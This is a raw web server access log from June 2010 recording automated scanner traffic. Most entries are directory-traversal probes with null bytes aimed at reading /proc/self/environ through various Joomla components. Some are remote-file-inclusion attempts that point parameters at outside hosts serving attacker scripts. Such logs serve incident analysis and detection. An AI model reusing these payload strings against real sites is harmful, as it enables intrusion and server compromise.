72.55.146.140 - - [07/Jun/2010:05:19:11 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:19:11 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:05:19:28 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
213.175.212.36 - - [07/Jun/2010:05:19:29 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:30 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:31 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:31 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:31 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:31 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:19:31 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
74.53.154.162 - - [07/Jun/2010:05:20:01 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:20:01 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:05:20:02 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
87.253.162.10 - - [07/Jun/2010:05:22:21 -0500] "GET /logs/upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:22:21 -0500] "GET /logs/upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:22:21 -0500] "GET /upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:22:21 -0500] "GET /upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:05:22:31 -0500] "GET /logs/upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:22:31 -0500] "GET /logs/upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:22:31 -0500] "GET /upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:22:31 -0500] "GET /upload.php?language=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
213.175.212.36 - - [07/Jun/2010:05:22:51 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:52 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:52 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:56 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:56 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:56 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:57 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:57 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:22:57 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:23:01 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:23:02 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:23:02 -0500] "GET /logs/access_log.1274832000/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:23:02 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:23:02 -0500] "GET /*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:05:23:02 -0500] "GET /logs/*.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
75.25.154.162 - - [07/Jun/2010:05:24:16 -0500] "GET /logs/access_log.1274832000//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:05:24:16 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:05:24:17 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.38.67.248 - - [07/Jun/2010:05:24:17 -0500] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.813"
84.38.67.248 - - [07/Jun/2010:05:24:17 -0500] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.813"
91.121.164.97 - - [07/Jun/2010:05:24:58 -0500] "GET /logs/access_log.1274832000//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:05:24:58 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:05:24:59 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.35.17 - - [07/Jun/2010:05:25:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:05:25:02 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:05:25:02 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.73.79.61 - - [07/Jun/2010:05:25:50 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:05:25:50 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:05:25:52 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:05:25:52 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
91.121.164.97 - - [07/Jun/2010:05:26:11 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:05:26:11 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
72.55.146.140 - - [07/Jun/2010:05:26:14 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:26:14 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:26:15 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:26:15 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:26:15 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:26:15 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.23.35.17 - - [07/Jun/2010:05:26:27 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:05:26:28 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.253.162.10 - - [07/Jun/2010:05:26:31 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:26:32 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:26:35 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:26:35 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:27:12 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:05:28:15 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:28:16 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:28:16 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:05:28:16 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:05:28:19 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:05:28:19 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:05:28:19 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:05:28:19 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:05:28:19 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:05:28:19 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:28:20 -0500] "GET /logs/access_log.1274832000/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:28:20 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:28:21 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.209.177.98 - - [07/Jun/2010:05:29:28 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:05:29:28 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:05:33:00 -0500] "GET /logs/access_log.1274832000//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:05:33:00 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:05:33:00 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
81.28.232.69 - - [07/Jun/2010:05:33:31 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
81.28.232.69 - - [07/Jun/2010:05:33:31 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
88.191.94.188 - - [07/Jun/2010:05:33:53 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:05:33:53 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.204.182 - - [07/Jun/2010:05:34:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.182 - - [07/Jun/2010:05:34:36 -0500] "GET /logs/access_log.1264032000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [07/Jun/2010:05:34:49 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:05:34:49 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.245.220.19 - - [07/Jun/2010:05:34:56 -0500] "GET /logs/index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.245.220.19 - - [07/Jun/2010:05:34:57 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.13.145 - - [07/Jun/2010:05:35:07 -0500] "GET /logs/access_log.1201132800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.87 - - [07/Jun/2010:05:35:36 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.253.162.10 - - [07/Jun/2010:05:35:58 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:35:58 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:35:59 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:05:35:59 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:05:36:13 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:36:13 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:36:21 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:36:21 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:36:23 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:05:36:24 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
216.245.220.19 - - [07/Jun/2010:05:38:01 -0500] "GET /logs/index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.245.220.19 - - [07/Jun/2010:05:38:01 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
218.146.255.196 - - [07/Jun/2010:05:39:20 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:39:40 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:40:03 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:40:44 -0500] "GET /logs/access_log.1274832000/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:40:45 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:40:45 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
190.152.145.54 - - [07/Jun/2010:05:41:03 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.soyuz-rybovodov.ru/pek1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:05:41:03 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://www.soyuz-rybovodov.ru/pek1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:05:41:03 -0500] "GET /logs/access_log.1271548800//bbs//delete_comment.php?board_skin_path=http://www.soyuz-rybovodov.ru/pek1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.146.255.196 - - [07/Jun/2010:05:41:49 -0500] "GET /logs/access_log.1274832000/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:41:49 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:41:49 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
190.152.145.54 - - [07/Jun/2010:05:42:10 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.soyuz-rybovodov.ru/pek1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:05:42:10 -0500] "GET /logs/access_log.1271548800//bbs//delete_comment.php?board_skin_path=http://www.soyuz-rybovodov.ru/pek1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:05:42:10 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://www.soyuz-rybovodov.ru/pek1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.146.255.196 - - [07/Jun/2010:05:42:16 -0500] "GET /logs/access_log.1274832000/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:42:16 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:42:16 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.67.244.57 - - [07/Jun/2010:05:42:58 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
81.28.232.69 - - [07/Jun/2010:05:43:12 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
81.28.232.69 - - [07/Jun/2010:05:43:12 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
62.67.244.57 - - [07/Jun/2010:05:44:40 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
62.67.244.57 - - [07/Jun/2010:05:44:40 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
